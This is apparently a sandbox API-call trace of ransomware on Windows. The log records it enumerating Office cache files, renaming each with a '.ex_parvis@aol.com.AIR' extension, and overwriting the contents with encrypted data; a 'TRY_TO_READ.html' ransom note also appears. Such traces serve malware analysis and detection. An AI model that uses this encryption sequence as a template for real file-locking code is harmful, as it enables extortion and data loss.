	[0084.270] FindNextFileW (in: hFindFile=0x5da370, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9eeba90, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9eeba90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0084.270] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbce0
	[0084.270] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0084.270] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0084.270] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0084.270] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0084.270] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0084.271] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0084.271] GetProcessHeap () returned 0x540000
	[0084.271] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5fb4b8
	[0084.271] lstrcpyW (in: lpString1=0x5fb4b8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0084.271] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0084.271] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0084.274] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x490
	[0084.274] GetProcessHeap () returned 0x540000
	[0084.274] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb4b8 | out: hHeap=0x540000) returned 1
	[0084.274] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2624) returned 1
	[0084.274] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xa40
	[0084.274] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0084.274] GetProcessHeap () returned 0x540000
	[0084.274] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0084.274] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0084.274] WriteFile (in: hFile=0x490, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0084.276] WriteFile (in: hFile=0x490, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0084.277] WriteFile (in: hFile=0x490, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.277] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa40) returned 0x3a20048
	[0084.277] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa40) returned 0x3790048
	[0084.277] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.277] ReadFile (in: hFile=0x490, lpBuffer=0x3a20048, nNumberOfBytesToRead=0xa40, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesRead=0x3a1f778*=0xa40, lpOverlapped=0x0) returned 1
	[0084.277] SetFilePointer (in: hFile=0x490, lDistanceToMove=-2624, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.277] WriteFile (in: hFile=0x490, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0xa40, lpOverlapped=0x0) returned 1
	[0084.277] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3a20048 | out: hHeap=0x540000) returned 1
	[0084.277] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3790048 | out: hHeap=0x540000) returned 1
	[0084.277] CloseHandle (hObject=0x490) returned 1
	[0084.278] GetProcessHeap () returned 0x540000
	[0084.278] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0084.278] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0084.278] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0084.278] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbce0 | out: hHeap=0x540000) returned 1
	[0084.278] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbc38 | out: hHeap=0x540000) returned 1
	[0084.278] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598df8
	[0084.278] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0084.278] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0084.278] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0084.278] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0084.278] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", dwFileAttributes=0x80) returned 1
	[0084.278] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 80
	[0084.278] GetProcessHeap () returned 0x540000
	[0084.278] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x106) returned 0x5fb4b8
	[0084.279] lstrcpyW (in: lpString1=0x5fb4b8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml"
	[0084.279] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0084.279] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0084.281] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x490
	[0084.281] GetProcessHeap () returned 0x540000
	[0084.281] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb4b8 | out: hHeap=0x540000) returned 1
	[0084.281] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=819) returned 1
	[0084.281] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x333
	[0084.281] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0084.281] GetProcessHeap () returned 0x540000
	[0084.281] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0084.281] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0084.281] WriteFile (in: hFile=0x490, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0084.283] WriteFile (in: hFile=0x490, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0084.283] WriteFile (in: hFile=0x490, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.283] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x333) returned 0x5fb4b8
	[0084.283] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x333) returned 0x5fb7f8
	[0084.283] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.283] ReadFile (in: hFile=0x490, lpBuffer=0x5fb4b8, nNumberOfBytesToRead=0x333, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb4b8*, lpNumberOfBytesRead=0x3a1f778*=0x333, lpOverlapped=0x0) returned 1
	[0084.283] SetFilePointer (in: hFile=0x490, lDistanceToMove=-819, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.283] WriteFile (in: hFile=0x490, lpBuffer=0x5fb7f8*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb7f8*, lpNumberOfBytesWritten=0x3a1f778*=0x333, lpOverlapped=0x0) returned 1
	[0084.283] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb4b8 | out: hHeap=0x540000) returned 1
	[0084.283] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb7f8 | out: hHeap=0x540000) returned 1
	[0084.283] CloseHandle (hObject=0x490) returned 1
	[0084.284] GetProcessHeap () returned 0x540000
	[0084.284] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0084.284] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0084.284] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0084.284] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598df8 | out: hHeap=0x540000) returned 1
	[0084.284] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0084.284] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0084.284] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0084.284] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0084.284] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0084.284] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0084.284] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi", dwFileAttributes=0x80) returned 1
	[0084.284] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 80
	[0084.284] GetProcessHeap () returned 0x540000
	[0084.284] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x106) returned 0x5fb4b8
	[0084.284] lstrcpyW (in: lpString1=0x5fb4b8, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi"
	[0084.284] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0084.284] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0084.296] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x490
	[0084.296] GetProcessHeap () returned 0x540000
	[0084.296] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb4b8 | out: hHeap=0x540000) returned 1
	[0084.296] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=868864) returned 1
	[0084.296] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xd4200
	[0084.296] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0084.296] GetProcessHeap () returned 0x540000
	[0084.296] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0084.296] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0084.296] WriteFile (in: hFile=0x490, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0084.305] WriteFile (in: hFile=0x490, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0084.305] WriteFile (in: hFile=0x490, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.305] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4200) returned 0x3c20020
	[0084.305] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4200) returned 0x3d00020
	[0084.305] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.306] ReadFile (in: hFile=0x490, lpBuffer=0x3c20020, nNumberOfBytesToRead=0xd4200, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0xd4200, lpOverlapped=0x0) returned 1
	[0084.342] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9f11bf0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9f11bf0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da3b0
	[0084.343] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.343] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.343] GetLastError () returned 0x0
	[0084.343] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9f11bf0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9f11bf0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0084.343] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.343] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.343] GetLastError () returned 0x0
	[0084.343] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1
	[0084.343] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.343] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.343] GetLastError () returned 0x0
	[0084.343] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1
	[0084.343] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.343] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.343] GetLastError () returned 0x0
	[0084.343] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1
	[0084.343] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.343] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.343] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.343] GetLastError () returned 0x0
	[0084.344] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd900f00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbd900f00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x16854390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1
	[0084.344] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0084.344] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0084.344] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0084.344] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0084.344] GetLastError () returned 0x0
	[0084.344] FindNextFileW (in: hFindFile=0x5da3b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x147e5b00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x147e5b00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xff654fc0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1
